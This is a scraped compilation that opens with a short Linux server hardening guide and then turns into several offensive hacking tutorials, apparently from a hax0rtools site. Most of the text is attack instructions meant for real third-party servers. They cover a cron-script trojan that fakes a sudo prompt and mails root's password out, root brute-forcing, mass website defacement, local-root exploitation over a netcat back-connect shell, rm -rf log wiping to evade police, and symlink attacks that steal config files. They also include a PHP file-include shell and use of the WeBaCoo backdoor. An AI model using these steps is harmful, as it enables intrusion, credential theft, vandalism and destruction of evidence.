How to Secure a Linux Server

How to Secure a Linux Server?

The free, open-source GNU/Linux operating system is getting better each year for desktop use, but it's been a major contender for server use since the late 1990s. With popularity, however, it has become profitable for thieves to break into Linux servers and use them for spamming, scams, and serving pornography, among other things. Here are some ways you can protect your server from such a fate.

Steps

1. Learn to use Linux from the shell (command line). Every layer of software added on to make your system administration "easier" actually adds more methods for crackers to gain access to your machine and also reduces performance. All the further steps will assume your familiarity with using a shell.
   

Using lsof or a similar tool, find out on which ports your computer is listening for connections:

ns003:~# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
named 17829 root 4u IPv6 12689530 UDP *:34327
named 17829 root 6u IPv4 12689531 UDP *:34329
named 17829 root 20u IPv4 12689526 UDP ns003.unternet.net:domain
named 17829 root 21u IPv4 12689527 TCP ns003.unternet.net:domain (LISTEN)
named 17829 root 22u IPv4 12689528 UDP 209.40.205.146:domain
named 17829 root 23u IPv4 12689529 TCP 209.40.205.146:domain (LISTEN)
lighttpd 17841 www-data 4u IPv4 12689564 TCP *:www (LISTEN)
sshd 17860 root 3u IPv6 12689580 TCP *:ssh (LISTEN)
sshd 17880 root 3u IPv6 12689629 TCP *:8899 (LISTEN)
sshd 30435 root 4u IPv6 74368139 TCP 209.40.205.146:8899->dsl-189-130-12-20.prod-infinitum.com.mx:3262 (ESTABLISHED)

If in doubt, hack it out! Shut down any unknown or unneeded services, using the appropriate tools for your Linux distribution, such as update-rc.d on Debian systems, or in some cases editing the /etc/inetd.conf or/etc/xinetd.d/* files. Along with this, get rid of any tools your server provider added for system administration, such as Plesk.

Don't allow root logins on your primary sshd port 22 (set PermitRootLogin to "no"); many automated tools run brute-force attacks on that. Set up a secondary port for root access that only works by shared keys, disallowing passwords:

• Copy the sshd_config file to root_sshd_config, and change the following items in the new file:
  • Port from 22 to some other number, say 8899 (don't use this! make up your own!)
  • PermitRootLogin from "no" (you were supposed to set it to "no" for port 22, remember?) to "yes"
  • AllowUsers root add this line, or if it exists, change it to allow only root logins on this port
  • ChallengeResponseAuthentication no uncomment this line if it's commented out, and make sure it says "no" instead of "yes"
• Test this command: 
  
  sshd -D -f /etc/ssh/root_sshd_configand see if it works correctly -- try logging in from another computer (you must have already set up shared-key authentication between the two computers) using: 
  
  ssh -p8899 root@my.remote.serverand if so, control-C at the above (sshd) command to stop the sshd daemon, then add this to the end of /etc/inittab: 
  
  rssh:2345:respawn:sshd -D -f /etc/ssh/root_sshd_config
• Restart the init task: # init q This will run your "root ssh daemon" as a background task, automatically restarting it in case of failure.

Video

Tips

• Check your log files regularly to see what types of attacks are being run against your server./var/log/auth or /var/log/auth.log is a typical place to find attempted logins: 
  Jan 18 10:48:46 ns003 sshd[23829]: Illegal user rosa from ::ffff:58.29.238.252
  Jan 18 10:48:49 ns003 sshd[23833]: Illegal user rosemarie from ::ffff:58.29.238.252
  Jan 18 10:48:51 ns003 sshd[23838]: Illegal user ruth from ::ffff:58.29.238.252
  Jan 18 10:48:54 ns003 sshd[23840]: Illegal user sabine from ::ffff:58.29.238.252
  Jan 18 10:48:57 ns003 sshd[23845]: Illegal user sandra from ::ffff:58.29.238.252
• Regularly upgrade your operating system to add security fixes. On Debian: apt-get upgrade
• Monitor news on vulnerabilities at http://www.securityfocus.com/ and related websites.
• Try installing grsecurity and/or SELinux and/or AppArmour and/or PaX.

Warnings

• Nothing you can do will make your server completely secure. Have backups of all important files, and a backup plan in place in case the worst happens.
• Never trust a server that has been cracked. A cracker has access to 100% of the system once they have root access.

[TUT] Cpanel Cracking

Things Required :-

• Shelled site ( Download Best Shellz Here)
• Cpanel Password Cracker (Download  Password : www.hax0rtools.com)

Step By Step Tutorial :-

• First open you shell & upload the cpanel password cracker shell 
• Then go down & click on User .

• Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .

Tip: Password list should be short & effective . 

• When the cracking is finished, you will see the result . 

• After Getting the login info you can login by going to -> www.site.com:2082 or www.site.com/cpanel

FOR EDUCATIONAL PURPOSE ONLY

Root server without local root exploit

Many hackers find it difficult to find a local root exploit for rooting the server. So here is few methods you could try to gain root acess without using a local root exploit!

1. Custom Cron Tab Scripts

Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.

First, check out if there are any Cron Job Tasks:

 crontab -l 

If you see any Custom Script, we must Check out if we can Write on it.

Let’s say we got a Custom script here: /bin/cronscript

To check if we can Write a File, type:

 stat /bin/cronscript 


 (If you get something like: “-rwxrwxrwx” in the output, you can edit the File!) 

Let’s edit the file and send a Fake Error Message.

Make a Copy of the Original Script to /bin/cronscript.bak :

 cp /bin/cronscript /bin/cronscript.bak 

Edit the /bin/cronscript like this:

 #!/bin/sh 


 echo “An System Error Occured!” 


 echo “” 


 echo “Error Code: #131425″ 


 echo “” 


 echo “Update to get the Latest Patch for this Security Issue.” 


 read -s -p “[sudo] password for root ” rootpasswd 


 echo “” 


 echo “su: Authentication failure” 


 echo “” 


 sudo apt-get update && sudo apt-get upgrade 


 sudo echo “The Password is: $rootpasswd” > .kod 


 mail -s “Root’s Password” “  email@address.com  ” < .kod 


 rm .kod 


 mv  cronscript.bak cronscript 

You should just Replace the Underlined with your E-Mail and the Name of the Script!

After you save the File, type: chmod +x cronscript   to set it as Executable!

This script will:

- Send a Fake Error Message

- Request for the Root’s Password

- Send to your E-Mail Address the Password (make sure that there is the “ mail ” command at the /bin )

- Restore the Original File

When the Script gets Executed, the Root User will Enter his Password and it will be send to you!

It would be better if you had some knowledge on Bash Programming…

2. Enumerating all SUID Files

An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it.
What does this mean for you:   You can Escalate Priviliges in this way, if it is in an Important Directory.
you can Social-Engineer a Privileged User.

To find all SUID Files, type:

 find / -user root -perm -4000 -print 

This will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Priviliges!

3. Brute Forcing

I know what you are thinking after seeing the title, well this is different the tool we gonna use is called Rootdabitch

What is so special in this?

The magic about this tool is that It works in background, so you can leave it working for days until you have results... when the password is cracked it will be mailed to you :)

For this, you need to have phpshell/ reverse shell / ssh access to the target to run this tool, You can get the tool here Rootdabitch v0.1

Usage:

./rootdabitch.sh youremail@site.com

For kiddies:

First download rootdabitch to the server:

wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip

Extract it by the following cmd:

unzip rootdabitch-0.1.zip

Chmod it to 755:

chmod + x rootdabitch.sh

Finally run the script

./rootdabitch.sh youremail@site.com

Simply just chmod it and run the script. If the password is cracked you will have a mail containing the root password which will be in the file "passwords.txt" attached to the mail

Thats all have a gr8 day :)

MASS DEFACE TUTORIAL

today  i will tell you how to mass deface in few steps .. so lets start .

Things Required:

• Rooted server (check how to root a linux server tutorial  : Here)
• Mass deface script ( Download from Here password :www.hax0rtools.com )

Step By Step Guide :

• First we have to download our mass deface file, so as usual we will use the wget function

Type: wget www.somesite.in/massdeface.zip

• As we have downloaded it in a zip file, now we will unzip it by typing 

Type: unzip massdeface.zip

• One you have unziped it , we will now run the script by typing

Type: perl massdeface.pl

• Now after we have run the script it will show its usage [ perl mass.pl /tmp/index.html ], so according to that we have to run it, but before we do so  we have to download our deface page using wget . 

Type: wget http://www.somesite.com/index.html

• So once we have downloaded our deface page, now we will run the final command to mass deface .

Type: perl massdeface.pl /tmp/index.html

Hope all of you like my mass deface Tutorial ! 

Your comments would be appreciated :)

LINUX SERVER ROOTING Tutorial

Hello Hax0rtools.com Readers today i will show you how to root a server 


Root is the Administrator of all server. If someone got root access he can do anything with server like delete and copy anything on server ; can deface all the home pages (massive
deface )

Although there are mainly 3 wayz in which you can get into the server but here we will take the first method that is by local root

NEEDS :

• Netcat (Download from Here)
• Shelled site (Best Shellz Here)
• Local root exploit (which you can find it Here  Or Download This collection Here)

STEPS:

• In RUN program type cmd then type this  cd C:\Program Files\Netcat  but first save your netcat in the directory 

After it type this  : nc -n -l -v -p 443 , and you will get this -

Now open the url in which you had upload your shell and then connect it using back connect option in the shell(Be careful some shell do not have this option and do not use any proxy,tor or VPN), when connection is established you will get something like this -

Now you  have successfully connected ..  then we have to get the local root exploit like now we have   2.6.18-374 2011 . 

• Now we have to first  upload our exploit in a writable folder, simply we can just change the directory to the /tmp folder which is a standard writable folder . 

 command to change dir to /tmp : cd /tmp

• To upload your your exploit we will use the  wget function . 

Now Type : wget http://www.example.com/exploit.c 

Now exploit will be uploaded to tmp folder

 

•  (CASE TYPE 1) if you have uploaded your exploit as  (exploit.c) the we have to compile it, so to compile it we will type the following command .

Type : gcc exploit.c -o exploit

Note that  above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. 

(CASE TYPE 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .

Type: unzip exploit.zip 

• After we have done all the above steps correctly, its time to give permission so we will type the following  command 

Type: chmod 777 exploit

• Now  its time to run the Exploit, to run the exploit we will type the following command 

Type: ./exploit

Now the exploit will run & the server will be rooted  ;) .  To check weather we got root we can type 

Type: id or whoami  

NOW HOW TO CLEAR THE LOG AND COME OUT SAFELY FROM SERVER

If you do not want to caught yourself by Cops then delete the log using following commands

rm -rf /tmp/logs

rm -rf $HISTFILE

rm -rf /root/.ksh_history

rm -rf /root/.bash_history

rm -rf /root/.ksh_history

rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs

rm -rf /usr/local/apache/log

rm -rf /var/apache/logs

rm -rf /var/apache/log

rm -rf /var/run/utmp

rm -rf /var/logs

rm -rf /var/log

rm -rf /var/adm

rm -rf /etc/wtmp

rm -rf /etc/utmp

history -c

find / -name *.bash_history -exec rm -rf {} \;

find / -name *.bash_logout -exec rm -rf {} \;

find / -name "log*" -exec rm -rf {} \;

find / -name *.log -exec rm -rf {} \;

i hope you had learn how to root a server My next Tutorial will be about How to mass deface after rooting a server.

ANY PROBLEM THEN SHARE VIA COMMENT:

Symlink Tutorial for beginners

What do you mean by Symbolic links?

In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution.

How to Do Symlink on Web-server ? 

In Symlink you need to shell access like GNY,C99,r57 etc.. on website.. It's look like this


Now You need To create 1 directory with any Name like sym,test etc....

Now after Creating Directory You need 2 file
1. Blank .txt file in zip format.
2. .htaccess

The txt file include this "/" and save it..
and .htaccess file include this below code:

Options Indexes FollowSymLinks
DirectoryIndex test.htm 
AddType txt .phpAddHandler txt .php

and save it like ".htaccess"

now you need to upload both file zip and .htaccess. After Uploading both file We need to "unzip"
file using this command:

"unzip "file name" "

after unzip u show a txt file there. Now you need to open appropriate path in Web browser.

It's look like this.

Now Just Click on 1.txt file that you unzip a zip file. After Click on 1.txt file It include all Directory's of the Web-server check out below Image:

Ok done Now in Symlink we will check the Directory path like

1. /home/"Website Username"/Public_html/
2. /hsphere/local/home/c283273/

There are Different Path Just you need to check out it.

If you Click On "Home" You will get 403 Error Means Forbidden Error but never mid after you get this Error you need to add "Website Username"

To find WebUsers You need to execute This command

cat /etc/passwd

the path is "/Home/"website username"/public_html/"

After execute cat command it's look like above image.

Now Just find specific Target that have ADMIN LOGIN PAGE and CONFIG FILE

How did you find this specific Target site?

you need Server Ip and www.bing.com


To find Joomla,Wordpress and php site we can use this dork for it.
1. ip: 123.x.x.x index.php?option=2. ip: 123.x.x.x "Powered By WordPress" 
3. ip: 123.x.x.x .php?id= 
and more......

Finding Target site now you need to find config file. in joomla the config file name is "configuration.php" in wordpress "wp-config.php" etc.

You cannot directly see the file using like this

www.Target.com/wp-config.php
www.Target.com/configuration.php

But when we do symlink on specific Target we can show config file using Right click and view source..

It's look like above Image

This config file include site Database information like Database Name, Username, Password etc..

after getting this You can login into site data base and you can edit,delete of specific columns, fields etc..

But we need to change admin password. In many case The password is in MD5, base64 etc.. encrypted form. You need to Decrypt it... that's it.

after changing the password You know what to do...!!!

Bypass 403 Forbidden And Cant Read /Etc/Named.Config Error

Now days most of the Linux Kernel server show this error when you try to symlink the server . Most of the server which shows 403 forbidden has cant read named.config error when you try to symlink using scripts like Symlink_Sa or Madspot Security Team Shell or what ever script used for Automated Symlink .

This can be bypassed by Reading /ect/passwd and Symlink_Sa 3.0 can be used to bypass this . 

I will be posting the download link of some shells i will be using in this tutorial 

Best Script which can bypass cant read /ect/named.conf are :

1. Config Fucker By Web Root Hack Tools. ( Mass Symlink Config files )
2. Config Killer By Team Indishell . ( Mass Symlink Config file php based script )
3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files )
4. Symlink_Sa 3.0 Automated Symlink Script .

Usage : Config Fucker , Con fig Killer and Symlink Pain [~] Perl script just upload them on to the server make sure that you create a new directory . Upload the scirpt and use the command cat /ect/passwd to read all /ect/passwd from the server and copy them and just open your script and paste it there and click on Get Config and Your Done . Just open the link of the folder you created eg . site.com/sen/allsoft.pl you need to open site.com/sen/ and all config files will be there 

Note : Its better to create a php.ini file before you do this for 100 % Result 

All 4 shells i have mentioned i will post the download link 

And i will be using a another private shell for this which i wont be giving you all for Priv8 Issue its Mannu Shell Coded by Team Indishell Which can bypass cant read /ect/named.conf error easily . But 403 Forbidden Server cant be bypassed using this shell . 

So now if we cant symlink to the Public_html/ of the website we can use Symlink_sa 3.0 script Symlink Bypass Option -

So now that we can easily Symlink to /Public_html/ path of each website 

Now some server show 403 forbidden Error when you try to Symlink them so now lets see how to by pass this shit 



For 403 Forbidden Error i will be Using the Following Shells :

1. Dhanush Shell Coded By Arjun . ( This shell automitically creates .htaccess , php.ini and ini.php files after you login )
2. Mannu Shell by Team Indishell Private ! .
3. Symlink_sa 3.0 Script

I will be posting the download link of Dhanush shell and Symlink _sa 3.0 ( Mannu shell is private as i already told )

So what is the trick that makes us bypass 403 Forbidden , Its just the .htaccess and php.ini which contains the following code :

.htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

php.ini

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

1.) 403 Forbidden Error :

2.) Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .

3.) Mannu shell to Check if we Bypassed 403 Error : 

4.) Bypassed 403 Forbidden and Access to Public_html/ Path 

Bypassed can't read /ect/named.conf and 403 forbidden Error 

Here Download Link of all shell and script i used :  CLICK HERE

Backdoor a WEB SERVERS WITH WEBACOO

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a web server (hacked).

WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving stealth mechanism to execute commands on the compromised server. File obfuscated performs communication via HTTP header’s Cookie validating HTTP requests and responses from the web server.

WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined payloads. It also offers the “terminal” mode in which the user can establish a remote connection to the server and execute commands with privileges of the web service desired.

In many cases, this tool is used when a server does not have the Netcat.

INSTALLATION:

git clone git :/ / github.com / anestisb / WeBaCoo.git
wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz
. / Webacoo.pl-h

COMMANDS:

1) Create obfuscated backdoor ‘backdoor.php’ with default settings:

. / Webacoo.pl-g-o backdoor.php

2) Create ‘raw-backdoor.php’ backdoor de-obfuscated using the work “transit”

. / Webacoo.pl-g-o raw-backdoor.php-f 4-r

3) Set “terminal” connection to the remote host using the default settings:

. / Webacoo.pl-t-u http://127.0.0.1/backdoor.php

4) Set “terminal” connection to the remote host to configure some arguments:

. / Webacoo.pl-t-u-c http://127.0.0.1/backdoor.php “Test-Cookie”-d “TTT”

5) Set “terminal” connection to the remote host via HTTP proxy:

. / Webacoo.pl-t-u-p 127.0.0.1:8080 http://10.0.1.13/backdoor.php

6) Set “terminal” connection to the remote host via HTTP proxy with basic authentication:

. / Webacoo.pl-t-u-p http://10.0.1.13/backdoor.php user: password: 10.0.1.8:3128

7) Set “terminal” connection to the remote host via Tor and record activity:

. / Webacoo.pl-t-u-p http://example.com/backdoor.php tor-l webacoo_log.txt

Now, having installed the tool and knowing the commands, we will create the backdoor to get connection to the web server from the console.

For this case I obtained any server (hacked) where I’ll upload the backdoor that creare with the following command:

. / Webacoo.pl-g-o backdoor.php

The backdoor.php is created and placed in the folder of files (WeBaCoo), then go up the file to the server (hacked) and proceed to connect to the server with the following command:

. / Webacoo.pl-t-u http://www.sitio-web.com/backdoor.php

The connection to the server is perfect, so you get very fast connection.

Simple commands:

In this case will place “load” to see the commands that will handle the entire server, which are:

1) MySQL-CLI: MySQL Command Line Module:

mysql-cli (ex. ‘mysql-cli 10.0.1.11 admin pass’)

2) PSQL-CLI: Postgres Command Line Module:

psql-cli (ex. ‘testdb psql-cli 10.0.1.12 root pass’)

3) Upload: File Upload Module:

upload (ex. ‘upload exploit.c / tmp /’)

4) Download: File Download Module:

download (ex. ‘download config.php’)

5) Stealth: Stealth Enhance Module

stealth (ex. ‘stealth / var / www / html’)

These commands are easy to use, do a brief demonstration with MySQL-CLI command for db and connect to the server.

1) Download the configuration file:

download configuration.php

2) Open the configuration.php file copy of the MySQL user and password, you type the command:

mysql-cli 127.0.0.1:3306 db_user db_password

3) The tool will connect to MySQL, we can only type show databases; to appreciate all the DB.

Similarly use other commands to upload a local root exploit or download any server.

Now with this tool you no longer need to have the web server or make a BackConnection Netcat often fails, to connect to a web server.

I hope they can.